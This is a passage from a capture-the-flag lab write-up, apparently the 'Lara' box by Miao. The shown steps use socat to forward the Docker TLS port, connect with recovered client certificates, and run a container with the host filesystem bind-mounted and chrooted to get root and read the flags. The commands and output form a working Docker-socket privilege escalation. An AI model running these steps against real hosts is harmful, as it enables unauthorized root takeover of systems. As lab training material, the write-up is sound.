drwxrwxrwt 2 root root 40 Jan 7 15:38 .ICE-unix
drwxrwxrwt 2 root root 40 Jan 7 15:38 .X11-unix
-rw-r--r-- 1 nobody nobody 375176 Jan 7 17:23 socat
chmod +x socat
./socat TCP-LISTEN:2377,fork,bind=0.0.0.0 TCP:127.0.0.1:2376 &

Connect to the forwarded port with the recovered certificates:

root@miao:/tmp/certs# docker --tls --tlscacert=ca.pem --tlscert=client-cert.pem --tlskey=client-key.pem -H=tcp://192.168.2.32:2377 version
Client:
Version: 27.5.1
API version: 1.47
Go version: go1.22.2
Git commit: 27.5.1-0ubuntu3~22.04.2
Built: Mon Jun 2 12:18:38 2025
OS/Arch: linux/amd64
Context: default

Server:
Engine:
Version: 28.3.3
API version: 1.51 (minimum version 1.24)
Go version: go1.24.11
Git commit: bea959c7b793b32a893820b97c4eadc7c87fabb0
Built: Tue Dec 2 23:05:51 2025
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: v2.1.5
GitCommit: fcd43222d6b07379a4be9786bda52438f0dd16a1
runc:
Version: 1.3.4
GitCommit: d842d7719497cc3b774fd71620278ac9e17710e0
docker-init:
Version: 0.19.0
GitCommit:

List the containers (ps -a also tells us which image name is available locally):

root@miao:/tmp/certs# docker --tls --tlscacert=ca.pem --tlscert=client-cert.pem --tlskey=client-key.pem -H=tcp://192.168.2.32:2377 ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f59b9418f1ad laravel-vuln "docker-php-entrypoi…" 10 days ago Up 2 hours 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp hardcore_keller

Escalate: start a new container from the existing laravel-vuln image with the host's root filesystem bind-mounted at /mnt and chroot into it. The daemon runs as root on the host, so this is root on the host:

root@miao:/tmp/certs# docker --tls --tlscacert=ca.pem --tlscert=client-cert.pem --tlskey=client-key.pem -H=tcp://192.168.2.32:2377 run -v /:/mnt --rm -it laravel-vuln chroot /mnt sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

IV. Flags

/ # cat /root/root.txt /home/alice/user.txt 
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}
flag{user-0e5b3d83a8c1221b25d34e824decc1e7}

Lara
http://miao-sec.github.io/Maze-sec/Lara/
Author: Miao
Published: 9 January 2026
License: BY-MIAO